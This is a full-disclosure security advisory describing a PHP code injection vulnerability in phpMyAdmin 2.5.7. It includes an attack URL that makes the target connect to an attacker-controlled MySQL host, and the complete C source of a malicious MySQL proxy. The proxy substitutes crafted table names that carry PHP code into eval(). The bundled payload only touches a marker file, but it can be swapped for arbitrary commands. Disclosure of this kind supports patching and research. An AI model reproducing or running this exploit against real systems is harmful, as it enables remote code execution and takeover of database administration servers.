php codes injection in phpMyAdmin version 2.5.7.
Software : phpMyAdmin
Version : 2.5.7
Vulnerability : php codes injection
Problem-Type : remote user
phpMyAdmin is web-based mysql administration written
in PHP.
There is a vulnerability in phpMyAdmin version 2.5.7.
This vulnerability would allow remote user to inject
php codes
to be executed by eval() function (in file left.php).
However, This vulnerability only effect if variable
$cfg['LeftFrameLight']
set to FALSE (in file config.inc.php)
1. Bugs
The Bugs are phpMyAdmin do not prevent any user
from
1.a. Ability to grow up array variables by way of GET
params
PhpMyAdmin has multiple servers configuration stored
in array variables ($cfg['Servers'][$i]). They are
coded in file
config.inc.php.
They are usually set at instalation time by owner.
Each configuration contains mysql server information
to be used
by phpMyAdmin as host, port, user, password,
authentication type, database
name etc of mysql server.
Up to three servers configuration is provided by
default.
However, Uninitialized $cfg['Servers'][$i] allows
remote user to add server
configuration to the list of servers configuration by
growing up
$cfg['Servers'][$i] array through GET parameters.
Remote user could add server configuration like this
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers]
[4]
[host]=202.81.x.x&cfg[Servers][4]
[port]=8888&cfg[Servers][4][user]=alice ..
and so forth.
The running script will use the fourth server
configuration which remote user
supply.
1.b. Escape 'magic' quote (') oops
if variable $cfg['LeftFrameLight'] set to FALSE, this
part of codes is
executed.
$eval_string = '$tablestack[\'' . implode('\'][\'',
$_table) . '\']
[\'pma_name\'][] = \'' . str_replace('\'', '\\\'',
$table) . '\';';
eval($eval_string);
$eval_string will be php codes that executed by
function eval().
if we have one table named 'mytable', $eval_string
will have string value
$tablestack['']['pma_name'][] = 'mytable';
phpMyAdmin is improper to handle escaping single
quote.
So that with crafted table name with its name
contains meta-chars like this
\';exec(\"touch /tmp/touchable\");/*
$eval_string will have value
$tablestack['']['pma_name'][] =
'\\';exec("touch /tmp/touchable");/*';
In php language, It will interpret the string as
three php statements. The
second statement will be our exploite codes. The
last statement without
trailing comment just give a warning message in
php.
2. Exploite
Since mysql does not allow table name contain
meta-chars, we have to provide
a wrapper of mysql server. The wrapper acts like a
proxy except that it will
sends a fake table name, when client request a "SHOW
TABLES" query, by
replacing the real table name with a string contains
exploite codes.
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers]
[4]
[host]=attacker.host.com&cfg[Servers][4]
[port]=8889&cfg[Servers][4]
[auth_type]=config&cfg[Servers][4]
[user]=user&cfg[Servers][4]
[password]=pass&cfg[Servers][4]
[connect_type]=tcp&&cfg[Servers][4]
[only_db]=databasename
In attacker.host.com mysql wrapper will listen in
port 8889 waiting for
connection.
3. Proof of Concept
The exploite code, mysql wrapper written in c, can be
founded in attachment
or from
http://eagle.kecapi.com/sec/codes/phpmy-explt.c
4. Purpose
This full disclosure is intended to be educational
purpose.
Regards,
Nasir Simbolon
http://eagle.kecapi.com
--
timor Domini
-------------------------------------------------------
phpmy-explt.c
/*
* phpmy-explt.c
* written by Nasir Simbolon <nasir@xxxxxxxxxx>
* http://eagle.kecapi.com
* Jakarta, Indonesia
*
* June, 10 2004
*
* A phpMyAdmin-2.5.7 exploite program.
* This is a kind of mysql server wrapper acts
like a proxy except that it will sends a fake table
name,
* when client query "SHOW TABLES", by replacing the
real table name with a string contains exploite
codes.
*
* Compile : gcc phpmy-explt.c -o phpmy-explt
*
* run with
* ./phpmy-explt
*
* and go to your target and put
*
*
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers]
[4][host]=attacker.host.com&cfg[Servers][4]
[port]=8889&cfg[Servers][4]
[auth_type]=config&cfg[Servers][4]
[user]=user&cfg[Servers][4]
[password]=pass&cfg[Servers][4]
[connect_type]=tcp&&cfg[Servers][4]
[only_db]=databasename
*
* fill host,port,user,pass and databasename
correctly
*
*/
#include<stdio.h>
#include<sys/socket.h>
#include<netdb.h>
#define BIND_PORT 8889
#define MYSQL_PORT 3306
#define HOSTNAME "localhost"
#define DATABASE "phpmy"
#define BUFFER_LEN 1024
/* This is php code we want to inject into phpMyAdmin
Do NOT use single quote (') in the string, use
double quote (") instead
*/
char *phpcodes =
"exec(\"touch /tmp/your-phpmyadmin-is-vulnerable\");";
/* This is examples codes I captured when mysql
server
reply to client's request of query "SHOW TABLES"
query.
It shows database name 'phpmy' and contain one
tablename 'mytable'
Our aim is to manipulate the data received from
mysql server
by replacing 'mytable' with our exploide codes.
0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
'_' ,'p' ,'h' ,'p' ,'m' ,'y' ,0x3 ,0x40,0x0 ,0x0 ,
0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f,0x1 ,0x0 ,0x0 ,0x3 ,
-2 ,8 ,0x0 ,0x0 ,0x4 ,7 ,'m' ,'y' ,'t' ,'a' ,
'b' ,'l' ,'e' ,0x1 ,0 ,0 ,0x5 ,-2
*/
int build_exploite_code(char* dbname,char*
phpcodes,char** expcode)
{
char my1[21] =
{0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
'_'};
/* part of dbname ('p' ,'h' ,'p' ,'m' ,'y') */
char my2[15] =
{0x3 ,0x40,0x0 ,0x0 ,0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f,
0x1 ,0x0 ,0x0 ,0x3 ,-2};
/* part of int phpcodes string length +1 (8) */
char my3[3] = {0x0 ,0x0 ,0x4};
/* part of int phpcodes string length (7) */
/* part of tablename
('m' ,'y' ,'t' ,'a' ,'b' ,'l' ,'e' ) */
char my4[5] = {0x1 ,0 ,0 ,0x5 ,-2};
int len,i;
len = 21 + strlen(dbname) + 15 + 1 + 3 + 1 +
strlen(phpcodes) + 5 + 5;
*expcode = (char*) malloc(sizeof(char) * len);
i = 0;
bcopy(&my1[0],*expcode + i,21);
i += 21;
bcopy(dbname, *expcode + i,strlen(dbname));
i += strlen(dbname);
bcopy(&my2[0],*expcode + i,15);
i += 15;
(*expcode)[i] = 5 + strlen(phpcodes) + 1;
i ++;
bcopy(&my3[0],*expcode + i,3);
i += 3;
(*expcode)[i++] = 5 + strlen(phpcodes) ;
/* this is our exploite codes*/
(*expcode)[i++] = '\\';
(*expcode)[i++] = '\'';
(*expcode)[i++] = ';';
bcopy(phpcodes,*expcode + i,strlen(phpcodes));
i += strlen(phpcodes);
(*expcode)[i++] = '/';
(*expcode)[i++] = '*';
bcopy(&my4[0],*expcode + i,5);
return len;
}
/* connect to mysql server*/
int connect_mysql()
{
int s2;
struct sockaddr_in ina;
struct hostent *h;
h = gethostbyname(HOSTNAME);
/* set internet address */
bcopy(h->h_addr,(void
*)&ina.sin_addr,h->h_length);
ina.sin_family = AF_INET;
ina.sin_port = htons(MYSQL_PORT);
//ina.sin_zero[0]='\0';
if((s2=socket(AF_INET,SOCK_STREAM,0)) < 0)
perror("Socket: ");
if(connect(s2,(struct sockaddr
*)&ina,sizeof(ina)) < 0 )
perror("connect()");
return s2;
}
/* listener */
int listener()
{
int s1;
int opt;
struct sockaddr_in ina;
/* set internet address */
ina.sin_family = AF_INET;
ina.sin_port = htons(BIND_PORT);
ina.sin_addr.s_addr = INADDR_ANY;
if((s1=socket(AF_INET,SOCK_STREAM,0)) < 0)
perror("Socket: ");
opt = 1;
setsockopt(s1,SOL_SOCKET, SO_REUSEADDR , (char
*)&opt, sizeof(opt) );
if(bind(s1,(struct sockaddr
*)&ina,sizeof(ina))==-1)
perror("Bind: ");
if(listen(s1, 10) == -1)
perror("Listen");
return s1;
}
int main(int argc,char* argv[])
{
struct sockaddr_in ina1;
int ina1_l;
int s_daemon,s_mysql;
size_t byte_read,byte_written;
char *buf;
int sc,event,n_select;
fd_set rfds;
struct timeval tv;
int exptlen,i;
char *expt;
char *dbname=DATABASE;
buf = (char*) malloc(sizeof(char) *
(BUFFER_LEN));
tv.tv_sec = 15;
tv.tv_usec = 0;
/* we listen to port */
s_daemon = listener();
exptlen =
build_exploite_code(dbname,phpcodes,&expt);
for(;;)
{
fprintf(stderr,"waiting for
connection\n");
if( -1 == (sc = accept(s_daemon,(struct
sockaddr *) &ina1,&ina1_l)) )
perror("accept()");
/* if we get here, we have a new
connection */
fprintf(stderr,"got client connection\n");
mysql:
/* connect to mysql */
s_mysql = connect_mysql();
for(;;)
{
FD_ZERO(&rfds);
FD_SET(sc,&rfds);
FD_SET(s_mysql,&rfds);
n_select = (sc > s_mysql)? sc :
s_mysql;
event =
select(n_select+1,&rfds,NULL,NULL,NULL);
if(-1 == event)
perror("select()");
else
{
if(FD_ISSET(s_mysql,&rfds))
{
byte_read =
read(s_mysql,buf,BUFFER_LEN);
/* check for closing client
connection*/
if(byte_read == 0)
{
shutdown(s_mysql,SHUT_RDWR);
close(s_mysql);
goto mysql;
}
/* check data received from
mysql server.
* if buf[11] contain 'T',
data received from mysq server is table list
*
* NOW we replace the table
with our exploite codes and send them to client
*/
if( 'T' == buf[11])
{
for(i=0;i<exptlen;i++)
buf[i] = expt[i];
byte_read = exptlen;
}
if(write(sc, buf, byte_read)
< 0)
break;
}
if(FD_ISSET(sc,&rfds))
{
byte_read =
read(sc,buf,BUFFER_LEN);
/* check for closing client
connection*/
if(byte_read == 0)
{
close(sc);
break;
}
if(write(s_mysql,buf,byte_read)
< 0)
break;
}
#if defined(DEBUG)
fprintf(stderr,"data:\n");
for(i=0;i<byte_read;i++)
fprintf(stderr," %c(%x)
",buf[i],buf[i]);
#endif
}
}
}
free(buf);
free(expt);
return 0;
}